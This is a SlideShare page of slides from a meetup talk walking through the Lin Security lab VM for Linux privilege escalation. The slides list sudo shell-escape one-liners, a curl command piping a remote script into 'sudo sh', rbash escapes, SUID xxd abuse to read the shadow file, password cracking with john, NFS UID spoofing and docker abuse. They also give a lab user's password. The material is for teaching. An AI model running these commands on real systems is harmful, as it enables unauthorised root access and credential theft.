Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Linux Privilege Escalation with Lin Security.

361 views

Published on

These slides cover 30-40 different ways to do privilege escalation and become root. There were presented at Null Bhopal. Details on this link: https://null.co.in/events/491-bhopal-null-bhopal-meet-16-september-2018-monthly-meet

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Linux Privilege Escalation with Lin Security.

  1. 1. Linux Privilege Escalation with Lin Security - Deepanshu
  2. 2. whoami ● Null Bhopal Chapter Lead ● Google Summer of code at Debian ● NullCon 2018 volunteer ● Student UIT RGPV ● Open Source contributor ● Footballer
  3. 3. What do we know about Lin Security ● Boot to root type ● Specifically for Linux privilege Escalation ● Difficulty level - Easy to intermediate ● Virtual Machine is based on ubuntu 18.04 ● One of the User’s name and password is bob / secret
  4. 4. Lets start with checking ssh ● We can use telnet for this ● If it prints the ssh version then ssh is running on the box
  5. 5. Let's do a full portscan as well
  6. 6. We are in
  7. 7. Lets explore directories Finding.. There are directories present for 3 other user Bob Susan Peter
  8. 8. This looks like something important
  9. 9. Could be susan’s password. Lets try it Yes it was susan’s password indeed. Let exit out and explore more with bob user.
  10. 10. There is some hint in the screenshot provided.
  11. 11. With sudo -l we can see ways for privilege escalation https://gtfobins.github.io/
  12. 12. Some of the easy ways are- ● sudo -i ● sudo ash ● sudo bash ● sudo sh ● sudo csh ● sudo dash ● sudo env /bin/sh ● sudo zsh ● sudo tclsh ● sudo expect -i
  13. 13. Medium level ways - ● sudo perl ● exec "/bin/bash"; ● ctrl+d ● sudo ftp ● !/bin/bash ● sudo man id ● !sh
  14. 14. ● sudo more /etc/passwd ● !sh ● sudo vi ● :bash ● sudo vi -c '!sh'
  15. 15. ● sudo awk 'BEGIN {system("id")}' ● sudo find /dev/null -exec sh ; ● We exploit curl by run scripts as root: curl -sf -L https://raw.githubusercontent.com/d78ui98/Scripts/master/id.sh | sudo sh
  16. 16. One question. Are there only 3 users? Bob susan peter
  17. 17. We can see /etc/passwd for that
  18. 18. Screenshot /etc/passwd
  19. 19. ● Using /etc/passwd we found user insecurity. ● It is a root user as it has id 0 ● We can easily crack its password with some cracking tool as john. ● And login with insecurity user with root privileges
  20. 20. Lets get back to user susan ● We already know its password is MySuperS3cretValue!
  21. 21. We are In!
  22. 22. ● Susan has rbash ○ Reason 1 : we cannot change directory ○ Reason 2: we cannot change path ● Thats why we have really limited functionalities ● I first thought of getting a normal shell ● We can do it with : less .bashrc :!sh Or simply by bash
  23. 23. Just some of the Methods that I tried to get a normal shell
  24. 24. Another approach with user susan ● I noticed that user susan is in group itservices ● We can check the files that are in same group
  25. 25. There was lot of output but one particular result caught my attention
  26. 26. xxd allows us to make a hexdump or do the reverse This is even more interesting:
  27. 27. ● The owner of /usr/bin/xxd is root ● SUID allows the binary to run with the privileges of owner ● Since the owner group is in the group itservices ● And susan is also in the group itservices ● We can execute commands as root user
  28. 28. Next thing we need to do is find a way to get sensitive information from xxd
  29. 29. After trying and failing with the option from man xxd I came up with this:
  30. 30. Xxd can also be used to view logs
  31. 31. We have the hash of root and all other users We can use john to crack the passwords
  32. 32. Cracking password with john ● Copy the shadow and passwd file ● Unshadow it. Crack it.
  33. 33. For some reason john was unable to crack peter’s password Lets refer to findings of nmap again
  34. 34. Looks like some RPC service is running
  35. 35. We can mount peter’s home directory to a local directory
  36. 36. Mounting to a local directory
  37. 37. Notice that the user id of contents in peter’s home directory is 1001. We need to make dummy user with same UID to edit its content Ubuntu users:
  38. 38. Setting correct permission
  39. 39. We are In!!
  40. 40. Exploiting docker
  41. 41. Lets see what are we allowed to run with sudo
  42. 42. Again we can make use of GTFObin here
  43. 43. That would be almost the end of the session..
  44. 44. Thank you!!
  45. 45. Questions?
  46. 46. Resources ● https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/ ● https://payatu.com/guide-linux-privilege-escalation/ ● https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ ● https://in.security/lin-security-walkthrough/

×